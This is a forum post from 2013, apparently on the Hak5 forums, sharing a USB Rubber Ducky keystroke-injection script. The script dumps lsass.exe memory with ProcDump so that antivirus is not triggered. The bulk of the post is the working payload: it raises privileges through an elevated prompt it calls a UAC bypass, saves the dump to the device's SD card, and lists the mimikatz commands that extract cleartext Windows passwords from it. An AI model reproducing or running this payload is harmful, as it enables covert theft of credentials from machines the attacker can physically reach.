Darren Kitchen Posted August 31, 2013 Share Posted August 31, 2013 Here's a version of the Mimikatz password recovery payload that doesn't set off AV. See here for background: https://forums.hak5.org/index.php?/topic/29657-payload-ducky-script-using-mimikatz-to-dump-passwords-from-memory/ This uses the Twin Duck firmware and makes use of the Microsoft Sysinternals utility ProcDump.exe. While slower, the advantage here is that ProcDump.exe doesn't alarm anti-virus. Props to @mubix - I based this on his blog post http://www.room362.com/blog/2013/6/7/using-mimikatz-alpha-or-getting-clear-text-passwords-with-a.html I started a new thread because I'm curious if anyone has ideas on how this could be sped up. With the slow transfer speed of the twin duck and the large'ish filesize of the .dmp (42 MB on my system) would it be possible to save it locally then "grep" the important (smaller?) bits out before transferring them over. REM Author: Hak5Darren with the help of: REM @gentilkiwi, @Mubix, redmeatuk, shutin, DyFukA, Microsoft, Sysinternals REM REM Description: "Backup" Windows Passwords without setting off AntiVirus REM Dumps memory of lsass.exe using Microsoft Sysinternals util ProcDump REM Passwords can be later be extracted using mimikatz. REM REM Firmware: Use c_duck_v2.1.hex firmware (Twin Duck) to execute from SD REM card labeled "DUCKY" and save log file as %COMPUTERNAME%_lsass.dmp REM Include procdump.exe on root of DUCKY SD card. Download ProcDump from: REM http://technet.microsoft.com/en-us/sysinternals/dd996900.aspx REM REM Target: Windows Vista/7/8, Win32/x64 REM *** UAC Bypass *** DELAY 2000 WINDOWS r DELAY 200 STRING powershell Start-Process cmd.exe -Verb runAs ENTER DELAY 2000 ALT y DELAY 500 REM *** Define DUCKY drive as %duck% STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d ENTER DELAY 500 REM *** Execute procdump from SD card and save log file to disk *** STRING %duck%\procdump.exe -accepteula -ma lsass.exe %duck%\%COMPUTERNAME%_lsass.dmp ENTER REM *** GTFO *** STRING exit ENTER REM *** Post Exploitation *** REM From your PC copy the %COMPUTERNAME%_lsass.dmp off the DUCKY SD card to a REM directory including the version of mimikatz for your targets architecture REM (NT5 win32, NT5 x64, NT6 win32 or NT6 x64) and run the following commands REM mimikatz.exe <enter> REM sekurlsa::minidump %COMPUTERNAME%_lsass.dmp <enter> REM sekurlsa::logonPasswords full <enter> I'm also curious if a powershell version could be created using this: https://github.com/mattifestation/PowerSploit/blob/master/Exfiltration/Out-Minidump.ps1 Quote Link to comment Share on other sites More sharing options...
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.